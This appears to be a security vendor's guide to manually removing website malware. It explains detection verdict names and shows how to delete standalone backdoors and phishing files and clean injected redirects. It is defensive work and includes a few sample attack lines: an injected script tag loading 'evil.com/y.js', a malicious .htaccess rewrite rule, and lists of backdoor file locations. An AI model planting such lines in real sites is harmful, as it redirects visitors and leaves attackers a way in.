Manual malware cleanup
How to clean a website? How to remove malware? In case ImunifyAV, Linux server antivirus, signals about malware that have been found, please find the guidelines for the malware infection cleanup which can be done manually below:
- Step 1: Backup
- Step 2: Understand What the Malware Is
- Step 3: Malware Removal
- Step 4: Repeat
- Step 5: Secure
Step 1: Backup
Before cleaning the website it is highly recommended to perform a full backup of the data undergoing cleanup. For example, for a WordPress-based website - please make sure that backup has been made not only for files but for the database as well.
Step 2: Understand What the Malware Is
First of all, all Imunify products follow the malware classification convention. Here are few brief classification examples:
Malware type |
Detection type |
ID |
filetype.categorty.classification |
Version |
SMW |
INJ |
16402 |
js.spam.redi |
18 |
CMW |
SA |
12147 |
mlw.wshll |
5 |
SMW |
BLKH |
1246640 |
php.bkdr.anonfox.autoast |
1 |
SMW - stands for Server Malware, it means that malicious code executes on the server side. CMW - malicious executes on the client’s side, e.g in the browser.
INJ - malicious code was injected in the file.
SA and BLKH - standalone malware file - fully malicious.
Imunify360 also has the ability to clean up malware in the database, it uses its innovative MDS (Malware Database Scanner), to clean up arbitrary redirects, spam/phishing, and PHP/JS malware. Any regular signatures also work on db, additionally, it may find CMW-URL-* detections, they are signatures based on the proper Imunify360 malicious URLs database, an advanced global intelligence db.
Step 3: Malware Removal
Manual malware removal will require some basic knowledge of the command line and programming. Alternatively, Imunify360 can handle malware removal in seconds and ensure the reliability of the server.
Step 3.1: Removal of Standalone Malware
In case the file is flagged by -SA- or -BLKH- signature - it is entirely malicious and can be completely removed using control panel file manager or Linux CLI.
Here is a top 20 standalone malware verdicts:
SMW-SA-15778-php.bkdr.wshll.wpnull24 SMW-SA-12273-mlw.drwy SMW-SA-15255-php.bkdr.wshll.wpnull24 SMW-SA-04892-php.bkdr.wpvcd SMW-SA-17965-php.bkdr.wp.fake SMW-SA-15534-php.bkdr.drpr.wpnull24 SMW-SA-12883-mlw.phish SMW-SA-13119-mlw.tool.spam.wpvcd SMW-SA-15256-php.bkdr.wshll SMW-SA-13600-php.phish.gen SMW-SA-16489-php.deface.gen SMW-SA-15618-php.bkdr.fakeplugin.wpvcd SMW-SA-12609-mlw.deface SMW-BLKH-74202-elf.trojan SMW-BLKH-20827-php.spam SMW-BLKH-33002-html.phish |
Figure 1 - Standalone malware alert
Backdoors
Often standalone malicious software spreads freely as part of a nulled popular theme or plugin.
Figure 2 - Standalone backdoor in nulled theme
The figure above shows part of the standalone backdoor bundled together with the nulled website template flagged by SMW-SA-15255-php.bkdr.wshll.wpnull24
Phishing
Another great example of standalone malicious files is phishing. Typically all phish infections are standalone. Here is an example that mimics as Google sign-in form. SMW-SA-18231-html.phish:
Figure 3 - Standalone phishing file
Hacking Tools
The screenshot below shows part of the standalone PHP hacker toolkit produced by AnonymousFox hacker group and it is flagged as SMW-BLKH-1246640-php.bkdr.anonfox.autoast
Figure 4 - AnonymousFox hacking tool
Fake Favicon
On the listing below there are fake favicon .ico files that have malicious code inside them.
Top standalone malware file locations cloaking as .ico:
wp-content/.102ab028.ico wp-includes/js/codemirror/.903876dc.ico sites/favicon_3bedeb.ico favicon_1c9d85.ico wp-content/uploads/2015/02/init.locked.ico wp-includes/apache.ico cgi-bin/.a3269f8f.ico wp-content/themes/twentyfourteen/suspected.client.ico components/cookie.http.ico wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/clases.session.ico public_html/favicon.ico public_html/fav.ico wp-includes/js/tinymce/themes/css.db.ico httpdocs/path/modes.session.ico public_html/favicon11.ico /sites/default/files/favicon.src.ico /uploads/suspected.system.ico |
Warning!
In some cases, standalone malware might be passed as an include file by malware injections to some legitimate files on the website. In this case, removing the standalone file might cause 5xx server-side errors or a White Screen Of Death (WSOD) for the website. To be on the safe side it is mandatory to perform a search from the website webroot for any possible file inclusions. Here is an example of a CLI command to search for non-obfuscated WP-VCD malware inclusion instructions:
grep -r --include=*.php -e "class.plugin-modules.php" -e "class.theme-modules.php" -e "wp-vcd.php" -e "wp-tmp.php" . |
This command will search within the code of all PHP files and return the filenames that contain any mentioning of the detected standalone malware files.
Alternatively standalone malicious files could be left empty instead of being completely removed to make sure that any left-over inclusion will not cause server errors.
Step 3.2: Removal of Injected Malware
The injection type is a bit more tricky. They have -INJ- suffix in the verdict. Several types of cases that can occur will be reviewed in this article as well as what can be done to manually clean out the injections.
Figure 5 - Redirecting JavaScript injection rated as SMW-INJ-18422-js.spam.redi
Redirecting Injections
Top 10 redirecting malware verdicts:
SMW-INJ-16270-js.spam.redi SMW-INJ-18008-js.spam.redi SMW-INJ-17803-php.spam.drwy SMW-INJ-16402-js.spam.redi SMW-INJ-17738-js.spam.redi SMW-INJ-17896-js.spam.redi SMW-INJ-03990-html.drwy SMW-INJ-04270-htcss.mlw SMW-INJ-15453-js.spam.redi SMW-INJ-18223-js.spam.redi |
Redirecting malware usually redirects website user to spam sites, unwanted sites like pharma, adult websites, phishing pages or even tries to exploit vulnerable client’s software and compromise the system.
Figure 6 - .htaccess malware alert
Here is the list of redirection types covering major part of them:
- Redirection hack in .htaccess. Example of redirect based on .htaccess rule injection:
RewriteRule ^(.*),(.*)$ $2.php?rewrite_params=$1&page_url=$2 |
Another example shown on the following figure.
Figure 7 - redirecting .htaccess injection flagged by SMW-INJ-18736-htaccess.spam.redi
- Redirection hidden in CMS core files. Usually it is hidden in wp-config.php. Sometimes redirecting malware injections are hidden in core files like index.php, header.php, footer.php, wp-load.php, etc.
- JavaScript redirection malware infects the JavaScript(.js) files or injects redirecting scripts into PHP files.
Example: SMW-INJ-16402-js.spam.redi-18
Figure 8 - JavaScript redirection malware alert
Mitigation:
- Identify malware code inside the file. Sometimes it can be pretty straightforward, in other cases injection might be hidden.
Different approaches are possible here, for example:- comparing with old clean backups,
- comparing with the initial repository/vendor package of the CMS, theme, plugin, template.
In most cases it is also possible to identify malicious injection visually:
- obfuscated code inside of regular code,
- different formatting type,
- no line breaks (CR LF symbols).
- Clean out the malware using a control panel file manager or Linux CLI.
The below example shows a malicious redirection website link attached to a JavaScript file.
<script type='text/javascript' src='evil.com/y.js'></script>
With use of vi, emacs, vim or nano CLI editors a maliciously injected domain can be removed. Here ‘evil.com’ is an example of a malicious redirecting domain.
After removal:<script type='text/javascript' src=''></script>
Of course, the injection might be much more complicated and the amount of the code that has to be removed may vary. The following command
$ php -l traget_file.php
can be used to make sure that PHP syntax was not broken after injection removal. - In case if malware injection has been present in the .htaccess file, it might be hard, in some cases, to identify the start and the end of the injection. Incorrect removal of the injection might also break the syntax of the .htaccess file and lead to website malfunction. In order to avoid such issues for .htaccess cleanup, it is recommended to restore it from the clean backup before the infection appeared or copy from the vendor’s website of the CMS used. For example, samples of WordPress .htaccess files can be found using this link. And here is the link for Joomla!
Hidden Backdoors
Top 10 verdicts of injected backdoors:
SMW-INJ-03431-php.bkdr.eval.oneliner SMW-INJ-15535-php.bkdr.incl.wpnull24 SMW-INJ-14070-php.bkdr SMW-INJ-04278-php.bkdr SMW-INJ-03933-php.bkdr SMW-INJ-06044-php.bkdr.wpvcd SMW-INJ-17722-php.bkdr.exec SMW-INJ-12444-php.bkdr SMW-INJ-13122-php.bkdr.wp.remote SMW-INJ-03548-php.bkdr |
Usually, dangerous PHP functions such as eval, file_get_contents, create_function, etc. found in files located in wp-includes, images or other locations not designed for direct PHP code execution indicate malware injection. It also can be some CMS specific inserts like an admin user dropper function or attacker autologin function (under administrator).
Figure 9 - Alert for backdoor found wp-includes
Figure 10 - Backdoor in vim editor
In the example above, the WordPress targeted backdoor allowing attackers to autologin to the administrator panel. Unfortunately, it is not always easy to identify the backdoor visually. If clean source files of the software are available it is possible to use `diff` in server CLI or some online tool like diffnow to identify the injected code:
Figure X - Difference between the file infected by a backdoor and clean file
Mitigation:
Cleanup for such injections is similar to the previous section - via either the use of the file manager of the control panel or any CLI editor prefered to remove the malware inserts.
Figure 11 - Beginning of redirecting PHP injection inside nulled theme file flagged by SMW-INJ-13960-php.bkdr.wpvcd
Nulled Themes Malware
Top 10 nulled theme injections:
SMW-INJ-15535-php.bkdr.incl.wpnull24 SMW-SA-04892-php.bkdr.wpvcd SMW-INJ-15539-php.bkdr.incl.wpnull24 SMW-INJ-12809-php.bkdr.wpvcd SMW-INJ-06044-php.bkdr.wpvcd SMW-INJ-03674-php.bkdr.wpvcd SMW-INJ-13126-php.bkdr.wpvcd SMW-SA-18218-php.bkdr.wpvcd SMW-INJ-13129-php.bkdr.wpvcd |
Quite a big part of the modern malware landscape is taken by injections coming from nulled, cracked premium CMS templates. Very often such injections look similar to normal WordPress theme code.
Figure 12 - WPVCD infection alert for WordPress core file
Here the injection itself looks pretty benign:
Figure 13 - WPVCD injection that executes an additional file that contains a backdoor
Top 10 included backdoor file locations, some of them might be standalone malware, others not:
/wp-content/plugins/mplugin.php /wp-content/themes/exampletheme/class.theme-modules.php /wp-content/plugins/xmplplgn/functions/class.plugin-modules.php /assets/.default /wp-includes/js/tinymce/themes/themes.php /wp-admin/css/colors/colors.php /wp-content/uploads/2021/08/xuipenhd.php /wp-content/uploads/woocommerce_uploads/ytxpdvte.php /wp-content/plugins/monit.php /modules/mod_wrapper/nepetfzv.php |
Nulled themes quite often have a massive amount of backdoor injections in almost all files they contain. It may take some time to clean up all infections manually or will require some coding skills to automate the action.
Mitigation
Cleaning a nulled theme manually might be tricky since the clean version of the software might be not available and in some cases. It may be hard to understand which code is injected - the best option here is to restore the website from a backup prior to the theme installation and replace it with a clean (non-hacked) version.Alternatively, follow the previous steps described for standalone and injected malware to attempt to clean up the files manually.
Step 4: Repeat
Finally, after cleanup is done - rescan the website and make sure no more malware is present on the website. If something is still present - please repeat the steps of this guide starting from Step 2.
Step 5: Secure
After cleanup is completed follow this guide to make sure the infection will not happen again.
Conclusion
This article covers more than 50% of infection cases that the Imunify malware processing team saw during the last month. Naturally, there could be other even more complex variations of infections. A description of how to remove such malware just couldn’t fit into a blog article. Regardless of whether it is a typical infection or rare case - ImunifyAV+ could handle any of those malicious files. Please consider ImunifyAV+ as your tool of choice to fight malicious infections - it provides the built-in, one-click cleanup feature. Or get it as part of Imunify360's complete and comprehensive website security solution, which also includes an intelligent WAF, IDS and IPS, Proactive Defense, automated kernel patch management and more.